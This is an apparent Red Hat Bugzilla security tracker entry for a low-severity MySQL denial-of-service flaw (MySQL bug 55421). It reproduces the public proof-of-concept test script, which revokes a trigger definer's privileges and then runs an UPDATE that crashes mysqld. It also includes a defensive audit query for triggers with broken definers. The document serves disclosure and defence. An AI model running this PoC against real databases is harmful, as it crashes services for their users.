Bug 718257

Summary: mysql: DoS (crash) by processing error arising during trigger execution, when active SELECT statement present (MySQL bug#55421)
Product: [Other] Security Response
Reporter: Jan Lieskovsky <jlieskov>
Component: vulnerability
Assignee: Red Hat Product Security <security-response-team>
Status: CLOSED NOTABUG
Severity: low
Priority: low
Version: unspecified
CC: byte, tgl
Target Milestone: ---
Target Release: ---
Keywords: Security
Hardware: All
OS: Linux
Doc Type: Bug Fix
Last Closed: 2012-02-14 14:30:12 UTC
Bug Blocks: 717721

Description Jan Lieskovsky 2011-07-01 15:28:12 UTC
It was found that the MySQL server did not properly handle the processing of an error message which arose during trigger execution when another active SELECT SQL statement was present. A remote attacker (a valid SQL user) could use this flaw to cause a denial of service (mysqld daemon crash) via a specially-crafted SQL query.

References:
[1] http://dev.mysql.com/doc/refman/5.1/en/news-5-1-52.html
[2] http://bugs.mysql.com/bug.php?id=55421

Note:
On Red Hat Enterprise Linux systems, exploitation of this issue would lead only to a temporary denial of service, since the mysqld daemon gets automatically restarted upon encountering a crash.

Comment 1 Jan Lieskovsky 2011-07-01 15:29:51 UTC
Public PoC from [2]:
====================

# Non-concurrent MTR test

--disable_warnings
DROP DATABASE IF EXISTS celosia_features;
--enable_warnings

CREATE DATABASE celosia_features;
USE celosia_features;

GRANT ALL ON celosia_features.* TO 'systuser'@'localhost';

--connect(con1,localhost,systuser,,celosia_features)

CREATE TABLE t_celosia_1 (
  `user_num` bigint(20) unsigned DEFAULT NULL,
  `year` year(4) DEFAULT NULL,
  `modified` time DEFAULT NULL
);
INSERT INTO t_celosia_1 VALUES (7197513499,1937,'20:36:48');

CREATE TRIGGER celosia_features.upd_t_celosia_1
BEFORE UPDATE ON t_celosia_1 FOR EACH ROW SET new.modified = NOW();

CREATE TABLE `t_celosia_2` (
  `user_num` char(5) DEFAULT NULL,
  `year` year(2) DEFAULT NULL,
  `modified` timestamp NOT NULL
);

INSERT INTO `t_celosia_2` VALUES ('32264',56,'2010-07-18 17:36:31');

--connection default

REVOKE ALL PRIVILEGES, GRANT OPTION FROM 'systuser'@'localhost';

UPDATE IGNORE t_celosia_1 table1, t_celosia_2 table2
SET table1.user_num = 192720, table2.user_num = '39582'
WHERE table1.year = '1937' AND table2.year = '56';

# Cleanup

DROP DATABASE celosia_features;
DROP USER 'systuser'@'localhost';

--exit
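
The PoC makes the trigger fail by revoking its definer's privileges after the trigger was created. The following audit query is added here and is not part of the bug report or the PoC: it lists triggers whose DEFINER account is missing or no longer holds the TRIGGER privilege on the trigger's table, i.e. triggers that will raise a privilege error when fired. It assumes MySQL 5.1-style grant tables (mysql.user, mysql.db, mysql.tables_priv) and matches mysql.db.Db and mysql.user.Host exactly rather than with wildcard/pattern semantics.

```sql
-- Added audit query (not from the bug report or the PoC).
-- Lists triggers whose DEFINER account no longer exists or no longer holds
-- the TRIGGER privilege on the trigger's table; such triggers raise a
-- privilege error when fired, the condition the PoC creates with REVOKE.
-- Assumptions: MySQL 5.1-style grant tables, exact (non-wildcard) match on
-- mysql.db.Db and on mysql.user.Host.
SELECT
    t.TRIGGER_SCHEMA,
    t.TRIGGER_NAME,
    t.EVENT_OBJECT_TABLE,
    t.DEFINER,
    CASE
        WHEN u.User IS NULL THEN 'definer account missing'
        ELSE 'definer lacks TRIGGER privilege on table'
    END AS problem
FROM information_schema.TRIGGERS AS t
LEFT JOIN mysql.user AS u
       ON u.User = SUBSTRING_INDEX(t.DEFINER, '@', 1)
      AND u.Host = SUBSTRING_INDEX(t.DEFINER, '@', -1)
WHERE u.User IS NULL
   OR NOT (
        -- global TRIGGER privilege
        u.Trigger_priv = 'Y'
        -- database-level TRIGGER privilege
        OR EXISTS (SELECT 1 FROM mysql.db AS d
                   WHERE d.User = u.User AND d.Host = u.Host
                     AND d.Db = t.TRIGGER_SCHEMA AND d.Trigger_priv = 'Y')
        -- table-level TRIGGER privilege (Table_priv is a SET column)
        OR EXISTS (SELECT 1 FROM mysql.tables_priv AS tp
                   WHERE tp.User = u.User AND tp.Host = u.Host
                     AND tp.Db = t.TRIGGER_SCHEMA
                     AND tp.Table_name = t.EVENT_OBJECT_TABLE
                     AND FIND_IN_SET('Trigger', tp.Table_priv) > 0)
   )
ORDER BY t.TRIGGER_SCHEMA, t.TRIGGER_NAME;
```

Run it as an account with SELECT on the mysql schema; every row returned names a trigger that will fail on its next INSERT/UPDATE/DELETE, so either re-grant the privilege or redefine the trigger with a valid DEFINER.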

Comment 3 Jan Lieskovsky 2011-07-01 15:33:52 UTC
This issue did NOT affect the versions of the mysql package as shipped with Red Hat Enterprise Linux 4, 5, and 6.

--

This issue did NOT affect the versions of the mysql package as shipped with Fedora releases 14 and 15.